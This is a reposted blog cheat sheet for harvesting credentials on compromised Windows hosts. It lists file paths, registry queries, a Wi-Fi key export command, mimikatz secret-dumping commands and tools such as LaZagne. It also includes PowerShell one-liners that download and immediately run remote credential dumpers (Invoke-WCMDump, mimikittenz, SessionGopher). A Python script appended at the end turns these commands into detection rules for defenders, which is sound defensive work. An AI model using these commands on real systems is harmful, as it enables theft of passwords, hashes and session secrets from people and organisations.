Password Dumping
Created: 2019-10-14 20:46
Word count: 468
Reposted from "Post-Exploitation Credential Collection" (后渗透凭证收集), url: http://www.mottoin.com/detail/2211.html

1. Browsers
chrome
C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
firefox
C:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles
IE
C:\Users\Administrator\AppData\Local\Microsoft\Credentials
A tool can also be used for extraction. BrowserPasswordDump.exe supports exporting passwords from the following browsers:
Firefox
Google Chrome
Microsoft Edge
Internet Explorer
UC Browser
Torch Browser
Chrome Canary/SXS
CoolNovo Browser
Opera Browser
Apple Safari
Flock Browser
SeaMonkey Browser
SRWare Iron Browser
Comodo Dragon Browser

2. Windows Credential Manager
cmdkey /list
RDP connection history
reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"
Dump the passwords
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"
mimikatz can also be used
mimikatz.exe vault::cred

3. Email
EmailPasswordDump.exe supports exporting passwords from the following:
Microsoft Outlook Express
Microsoft Outlook 2002/XP/2003/2007/2010/2013
Mozilla Thunderbird
Windows Live Mail 2012
IncrediMail
Opera Mail
The Bat!
Foxmail v6.x - v7.x
Windows Live Messenger
MSN Messenger
Google Talk
GMail Notifier
PaltalkScene IM
Pidgin (Formerly Gaim) Messenger
Miranda Messenger
Windows Credential Manager
OutlookPasswordDump.exe

4. Software registry entries
REG query "HKEY_CURRENT_USER\Software" /v "password" /s

5. Wireless passwords
List the Wi-Fi networks that have been connected to
netsh wlan show profiles
Export the passwords
netsh wlan export profile interface=无线网络连接 key=clear folder=C:\windows\temp

6. VPN
C:\Users\Administrator\AppData\Roaming\Microsoft\Network\Connections\Pbk
Dump VPN passwords with mimikatz
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

7. Other Windows information
Unattended installation
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Windows password hint
reg query HKLM\SAM\SAM\Domains\Account\Users\<userkey>\UserPasswordHint
Windows cached hashes
reg query HKEY_LOCAL_MACHINE\SECURITY\CACHE
gpp
dir \\<DOMAIN>\SYSVOL /s /b /A | find ".xml"
Windows automatic logon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

8. LaZagne
A small tool that dumps many types of passwords
https://github.com/AlessandroZ/LaZagne.git
The password categories it supports are as follows:
chats,mails,all,git,svn,database,windows,wifi,sysadmin,browsers,games,memory,php,maven

9. Process-related
Search the target processes for sensitive strings
powershell "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1');Invoke-mimikittenz"
The processes are as follows:
#####Webmail#####
Gmail
Office365
Outlook Web
#####Accounting#####
Xero
MYOB
#####Remote Access#####
Juniper SSL-VPN
Citrix NetScaler
Remote Desktop Web Access 2012
#####Developement#####
Jira
Github
Bugzilla
Zendesk
Cpanel
#####IHateReverseEngineers#####
Malwr
VirusTotal
AnubisLabs
#####Misc#####
Dropbox
Microsoft Onedrive
AWS Web Services
Slack
Twitter
Facebook

Other information
FileZilla, PuTTY, WinSCP, RDP
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1');Invoke-SessionGopher"
TeamViewer
https://github.com/vah13/extractTVpasswords.git
McAfee
%AllUsersProfile%\Application Data\McAfee\Common Framework\SiteList.xml
SNMP
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
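
The commands listed in this post, seen from the detection side. The following Python is an added example, not code from the original post or from any tool it names: it matches process-creation command lines against one pattern per command and flags accounts that run several different ones. The rule labels, the threshold and the sample events are assumptions constructed for illustration.

```python
import re

# One pattern per collection command listed on this page. The patterns and the
# threshold are illustrative assumptions for triage, not a vendor rule set.
RULES = [
    ("credential manager listing", r'\bcmdkey(\.exe)?\s+/list\b'),
    ("RDP history query", r'\breg(\.exe)?\s+query\s+.*terminal server client\\default'),
    ("registry password sweep", r'\breg(\.exe)?\s+query\s+.*/v\s+"?password"?\s+/s\b'),
    ("Wi-Fi key export", r'\bnetsh(\.exe)?\s+wlan\s+export\s+profile\b.*\bkey=clear\b'),
    ("SAM/SECURITY hive query",
     r'\breg(\.exe)?\s+query\s+"?(hklm|hkey_local_machine)\\(sam|security)\\'),
    ("autologon query", r'\breg(\.exe)?\s+query\s+.*\\currentversion\\winlogon'),
    ("SYSVOL xml sweep", r'\bdir\s+\\\\[^\\\s]+\\sysvol\b.*\.xml'),
    ("mimikatz module", r'\b(vault::cred|lsadump::(sam|secrets)|token::elevate)\b'),
    ("download-and-run dumper",
     r'downloadstring\(.*\).*invoke-(wcmdump|mimikittenz|sessiongopher)'),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def classify(command_line):
    """Return the label of every rule that matches one command line."""
    return [name for name, rx in COMPILED if rx.search(command_line)]


def triage(events, threshold=3):
    """Flag (host, user) pairs that triggered at least `threshold` distinct rules.

    Any single command here is ordinary admin activity; several different ones
    from the same account is the pattern worth an analyst's time.
    """
    hits = {}
    for host, user, command_line in events:
        for label in classify(command_line):
            hits.setdefault((host, user), set()).add(label)
    return {key: sorted(labels) for key, labels in hits.items() if len(labels) >= threshold}


# Constructed process-creation events (host, user, command line); not real telemetry.
SAMPLE = [
    ("WS01", "alice", 'cmdkey /list'),
    ("WS01", "alice", r'reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"'),
    ("WS01", "alice", r'netsh wlan export profile key=clear folder=C:\windows\temp'),
    ("WS01", "alice", r'REG query "HKEY_CURRENT_USER\Software" /v "password" /s'),
    ("WS02", "bob", 'cmdkey /list'),
    ("WS02", "bob", 'netsh wlan show profiles'),
    ("FS01", "svc", r'cmd.exe /c dir \\corp.example\SYSVOL /s /b /A | find ".xml"'),
]

if __name__ == "__main__":
    for (host, user), labels in triage(SAMPLE).items():
        print(host, user, labels)
```

Feed it the command-line field from process-creation logging (for example Windows event 4688 with command-line auditing enabled) and tune the threshold to the environment.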
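
Please credit the source when reposting. You are welcome to verify the sources cited in this article and to point out anything that is wrong or unclear, either in the comment section below or by email to cxaqhq@qq.com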
Author: cx
Published: 2019-10-14, 20:46:00
Last updated: 2019-10-14, 21:17:12